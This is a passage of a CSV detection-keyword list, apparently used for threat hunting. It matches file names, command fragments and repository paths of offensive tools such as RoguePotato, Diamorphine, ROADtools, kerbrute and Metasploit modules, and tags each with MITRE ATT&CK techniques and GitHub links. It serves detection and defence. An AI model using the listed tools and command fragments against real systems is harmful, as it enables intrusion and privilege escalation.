TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg scan *",".{0,1000}rmg\sscan\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg scan * --ports *",".{0,1000}rmg\sscan\s.{0,1000}\s\-\-ports\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg serial * AnTrinh * --component *",".{0,1000}rmg\sserial\s.{0,1000}\sAnTrinh\s.{0,1000}\s\-\-component\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg serial *CommonsCollections*",".{0,1000}rmg\sserial\s.{0,1000}CommonsCollections.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg-*-jar-with-dependencies.jar*",".{0,1000}rmg\-.{0,1000}\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*rmg*--yso*",".{0,1000}rmg.{0,1000}\-\-yso.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*RMIRegistryExploit.java*",".{0,1000}RMIRegistryExploit\.java.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rmmod diamorphine*",".{0,1000}rmmod\sdiamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*roadrecon plugin *",".{0,1000}roadrecon\splugin\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roadrecon*gather.py*",".{0,1000}roadrecon.{0,1000}gather\.py.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roadrecon.db*",".{0,1000}roadrecon\.db.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roadrecon/frontend*",".{0,1000}roadrecon\/frontend.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*ROADtools.git*",".{0,1000}ROADtools\.git.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*ROADtools-master*",".{0,1000}ROADtools\-master.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*roastinthemiddle -i * -t * -u *.txt -g *",".{0,1000}roastinthemiddle\s\-i\s.{0,1000}\s\-t\s.{0,1000}\s\-u\s.{0,1000}\.txt\s\-g\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*robertdavidgraham/masscan*",".{0,1000}robertdavidgraham\/masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*RobustPentestMacro*",".{0,1000}RobustPentestMacro.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*ROCAVulnerabilityTester*",".{0,1000}ROCAVulnerabilityTester.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RocksDefaultRequestRocksDefaultRequestRocksDefaultRequestRocks*",".{0,1000}RocksDefaultRequestRocksDefaultRequestRocksDefaultRequestRocks.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rockyou.txt.gz*",".{0,1000}rockyou\.txt\.gz.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*rockyou.txt.gz*",".{0,1000}rockyou\.txt\.gz.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rockyou-30000.*",".{0,1000}rockyou\-30000\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*RogueOxidResolver can be run locally on 127.0.0.1*",".{0,1000}RogueOxidResolver\scan\sbe\srun\slocally\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*RogueOxidResolver.cpp*",".{0,1000}RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.cpp*",".{0,1000}RoguePotato\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.exe*",".{0,1000}RoguePotato\.exe.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.sln*",".{0,1000}RoguePotato\.sln.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato.zip*",".{0,1000}RoguePotato\.zip.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RoguePotato-master*",".{0,1000}RoguePotato\-master.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*RogueSploit*",".{0,1000}RogueSploit.{0,1000}","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/h0nus/RogueSploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RogueWinRM *",".{0,1000}RogueWinRM\s.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*RogueWinRM dll.*",".{0,1000}RogueWinRM\sdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RogueWinRM exe.*",".{0,1000}RogueWinRM\sexe\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RogueWinRM.c*",".{0,1000}RogueWinRM\.c.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RogueWinRM.cpp*",".{0,1000}RogueWinRM\.cpp.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*RogueWinRM.exe*",".{0,1000}RogueWinRM\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*RogueWinRM.zip*",".{0,1000}RogueWinRM\.zip.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*Rolix44/Kubestroyer*",".{0,1000}Rolix44\/Kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*roodkcaBdrauGifE*",".{0,1000}roodkcaBdrauGifE.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*rookuu/BOFs/*",".{0,1000}rookuu\/BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*Root backdoor obtained!*",".{0,1000}Root\sbackdoor\sobtained!.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" "*root cargo new --bin legba*",".{0,1000}root\scargo\snew\s\-\-bin\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*root\cimv2:Win32_Implant*",".{0,1000}root\\cimv2\:Win32_Implant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*root_userpass.txt*",".{0,1000}root_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rootcathacking/catspin*",".{0,1000}rootcathacking\/catspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*Rootkit is already installed*",".{0,1000}Rootkit\sis\salready\sinstalled.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Rootkit.cpp*",".{0,1000}Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*root-shellcode-linux*",".{0,1000}root\-shellcode\-linux.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rop.find_gadgets*",".{0,1000}rop\.find_gadgets.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*RopChain.py*",".{0,1000}RopChain\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*ROPEngine.cpp*",".{0,1000}ROPEngine\.cpp.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator *",".{0,1000}ropfuscator\s.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ROPfuscator*",".{0,1000}ROPfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator-*",".{0,1000}ropfuscator\-.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropfuscator.*",".{0,1000}ropfuscator\..{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "*ropnop/go-windapsearch*",".{0,1000}ropnop\/go\-windapsearch.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ropnop/kerbrute*",".{0,1000}ropnop\/kerbrute.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*rottenpotato.x64.dll*",".{0,1000}rottenpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - 